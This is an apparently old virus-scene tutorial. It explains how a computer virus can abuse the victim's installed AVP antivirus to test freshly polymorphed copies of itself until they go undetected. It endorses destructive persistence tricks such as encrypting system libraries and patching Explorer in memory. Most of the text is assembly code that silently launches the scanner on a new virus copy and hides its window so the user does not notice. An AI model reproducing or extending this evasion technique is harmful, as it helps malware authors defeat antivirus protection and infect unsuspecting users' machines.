Using Anti-Virus in Virus - By NBK[MATRiX] ~~~~~~~~~~~~~~~~~~~~~~~~~ My english is poor. I've based this idea in toolz like KME32 poly engine from Z0mbie, and AVP. OK, so you've done a virus hard to remove, encrypting system libraries and decrypting it on access, using EXPLORER.EXE patch in memory, infecting MS-DOS EXE's to keep your virus running in the system, using EPO, etc, etc, ... But the user notice something strange in his computer, so he'll buy a new AV and try to remove the virus. AV will only report infections, bcz your virus can't be fucked, or the system will be too. Why don't your virus use this AV to avoid detection ? In this example i'm using AVP, but you can change it ... First off all, we need to wait for a no-user-activity, maybe checking if the mouse stops for a long time, or setting the thread priority to idle...you choose. Locate the configuration file from the AV, AVP uses AVP32.INI in WINDOWS directory. Get the AVP32.EXE path, too AVP32.INI tell us the "ReportFileName" in [Options] section, usually report.txt. Locate this report file and copy the path for it. Now you've the path for AVP32.EXE (C:\XXX\AVP32.EXE) and the report file (C:\XXX\REPORT.TXT), you need to generate a new copy from your virus and scan it with the AV. In KME32, the original code is multiplied by 6 when you make it poly, but you can do this more times, like: original virus size: 4096 bytes ----> 24576 bytes ----> 147456 bytes You can use the poly engine till you virus stay undetectable, i know it'll grow a lot, but this is the price. Your babe don't need to do this shit all the time he needz to send itself by mail or something like, but generate a copy in the user's free time and keep it safe, as it's undetectable. You can check the REPORT file layout by yourself, to check if the AV got your new virus copy. Scanning with AVP: ; This code will scan a specified file and hide AVP window. ; after all you can wait a bit (10-20 seconds) before exit the process and ; kill the AVP32.EXE from memory (you've the PROCESS_INFORMATION) to prevent ; future errors (not implemented here) .586p .model flat .code callx macro a extrn a:proc call a endm STARTUPINFO STRUCT cb DWORD ? lpReserved DWORD ? lpDesktop DWORD ? lpTitle DWORD ? dwX DWORD ? dwY DWORD ? dwXSize DWORD ? dwYSize DWORD ? dwXCountChars DWORD ? dwYCountChars DWORD ? dwFillAttribute DWORD ? dwFlags DWORD ? wShowWindow WORD ? cbReserved2 WORD ? lpReserved2 DWORD ? hStdInput DWORD ? hStdOutput DWORD ? hStdError DWORD ? STARTUPINFO ENDS PROCESS_INFORMATION STRUCT hProcess DWORD ? hThread DWORD ? dwProcessId DWORD ? dwThreadId DWORD ? PROCESS_INFORMATION ENDS SYSTEMTIME STRUCT wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMilliseconds WORD ? SYSTEMTIME ENDS start: nop ; fill startup buffer push offset startup callx GetStartupInfoA ; and execute the file push offset p_info push offset startup push 0 push 0 push 20h ; NORMAL_PRIORITY_CLASS push 0 push 0 push 0 push offset cmd_line push offset cmd_exec callx CreateProcessA look4: push offset avpwindow push 0 callx FindWindowA test eax, eax jz look4 mov edi, eax ; make AV window invisible mov ecx, 20 ; repeat this step for 10 seconds _hide: push ecx push 500 callx Sleep push 0 ; SW_HIDE push edi callx ShowWindow pop ecx loop _hide ; here you can kill AVP32.EXE and checks the REPORT file push -1 callx ExitProcess .data cmd_exec db 'C:\Arquivos de programas\AntiViral Toolkit Pro\AVP32.EXE',0 cmd_line db '"C:\Arquivos de programas\AntiViral Toolkit Pro\AVP32.EXE" ' db '"C:\XXX\Test1.exe"',0 avpwindow db 'AntiViral Toolkit Pro',0 startup STARTUPINFO <0> p_info PROCESS_INFORMATION <0> _systemtime SYSTEMTIME <0> times dw 0 end start end NBK[MATRiX]